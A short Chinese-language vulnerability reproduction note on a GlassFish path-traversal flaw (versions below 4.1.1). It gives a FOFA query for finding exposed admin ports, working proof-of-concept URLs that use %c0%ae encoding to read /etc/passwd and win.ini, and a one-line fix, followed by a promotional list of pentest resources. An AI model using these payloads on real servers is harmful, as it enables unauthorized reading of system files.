一、漏洞介绍glassfish是一款java编写的跨平台的开源的应用服务器。 java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点) 利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。(所以 glassfish 这个 poc 实际上就是…/…/…/…/…/…/…/…/…/…/…/etc/passwd) 二、影响版本< 4.1.1 三、漏洞复现1、fofa上搜索 'GlassFish' && port='4848'
根据搜索出的结果,找到一个 GlassFish 版本为4.1.1的测试 2、POC验证 #linux服务器 http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
#windows服务器 http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
根据 POC 验证,成功任意文件读取。 四、修复建议关闭远程管理关闭远程管理,关闭后只允许本地访问。
更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频 4、应急响应真实案例复现靶场与应急响应教程
|